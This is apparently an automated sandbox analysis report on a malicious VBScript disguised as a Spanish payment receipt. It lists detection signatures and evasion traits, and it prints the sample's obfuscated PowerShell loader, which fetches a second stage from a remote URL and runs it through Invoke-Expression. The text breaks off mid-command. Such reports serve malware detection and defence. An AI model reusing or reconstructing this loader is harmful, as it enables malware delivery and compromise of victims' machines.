Edit tour
Windows
Analysis Report
JUSTIFICANTE DE PAGO.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7332 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\JUSTI FICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7420 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Karyokin esis104 = 1;$Unrefra cting='Sub strin';$Un refracting +='g';Func tion Agono thet($Haan dgribelige ){$Judicio usness=$Ha andgribeli ge.Length- $Karyokine sis104;For ($organole ptically=5 ; $organol eptically -lt $Judic iousness; $organolep tically+=( 6)){$Bundl ses+=$Haan dgribelige .$Unrefrac ting.Invok e($organol eptically, $Karyokin esis104);} $Bundlses; }function popess($Rd stjerterne s){& ($S peecher) ( $Rdstjerte rnes);}$St entrykkeri erne=Agono thet 'Susp iMStaccoUn vigzOverli ,ntolQuai nl degeaPa ste/Arabi5 Strat.In.e r0V,cci Pe tit(mo,igW Und,iD ar mn C brdRa diooStraaw Pharys.yld i tilstNAf hjeTCanad Skov1S,edi 0 Min..H n ds0 Pant;S vend Ne.pa WbivaliPav eknPosts6S e,ip4Poro. ;Plebi Con atxHuele6 Gras4Servi ;Sonny ,iv varGeckovS hipp: Dans 1 ulmu2run en1 Pro .b r.sn0 Fina )Se vt Und e GForsteD esincHansg kBelonoFor h./Epose2a tmoc0nedve 1Float0Mis si0Vigne1H arce0 Gang 1Pte o .eg ynFEndl iK onverPaner eKruspf X. loo DistxA bdu./Klass 1 Fr.m2Chi nk1Auten.L .del0Rulle ';$Untest able27=Ago nothet ' P olyUTarogs ,onheeJobs r,okse-Te d iA Olymg UnhaneSagi tnMattetDa nse ';$Mbl ements=Ago nothet 'Be fryhUn ert Gr.fit Tag spPul,os.j tad:Macro/ T,edo/ Na. udBascurSh ippiChangv AuxineBegr n. A isgpr imeoLovbeo T rng Str alGoogoeD fer.Evighc Susp,oFr s emDeg,a/Ag ftauLea hc Tppeb?.asi meFlavoxTa utop Tremo Natur,irk etAgerk=Pi et.dVindio SpisewDesp inPaakllFi shsoEl,esa Mo.aidHiel a&outgli . lgedRusti= Seign1 uds tp Quen8 O verCafblaA Ka hi5i.te rIShawiWSk ovrVAfparR S.icigIntr agArrhigRt enjeDemarG LeptoBJo,g lHbolst5 S .rjJTillgt Gens.5 Ter mSParosAOv ern7Tingeb .kstzStil pDDk,eniAs cesw fo.wA Colu.7 Laz aDFemgreWa ggo ';$Gas hes=Agonot het 'Vekse > Tlle ';$ Speecher=A gonothet ' Gl.cyiTr.n seEkspoxS, ibs ';$Hje mgivelsen= 'Drfylding en';popess (Agonothe t 'Sam.uSR etateO,peb tDucti-Kan gaC Li soG rundnEnsom tOzon.eStr atnIleitt Dank p.ri- BesaaP Kan .aPrefat A lfah Tora KismTDrmm. :Halm \ Ul leC Ghosl Whalu Le.n sDomnetRew ineAccesr, necdyLands .fejlutNon auxCamayt. unkt Ubud -BinapVOve rmaAkti.l billuUnpar ePr.in Rub ri$JackaHI naprjJer.b eAstr,mSce nag RolliB and.vRecul e AnnalZan i.sKobbeeK ont,n,ncom ; Nonw '); popess (Ag onothet 'B rugeiBasse farbej Tou r(RestptG auceAnt ss SwerdtRela .-gondopTa ilgaKontot Usitah Hng e BifokTAk sle:Fanci\ KnickCFodt ulRevoluOr .ogs Af.ot ,npreeYngs trV venyBi tte.Rovdyt SalamxOmno rtBores)Be han{ Ek.ee ChillxTele ,i .trut U nl,} Slu ; L,vsf ');$ Julegavens = Agonoth et ' Bek e SheracUnwi rhvr.stoBe hnd Unmuz% anke,aOrig epBagr.p . ndhdGy,noa Per itPers paKomed% f ixu\TocorT B,boer For haHaroln B rungHan,ls Gyptet,ark fiMictul P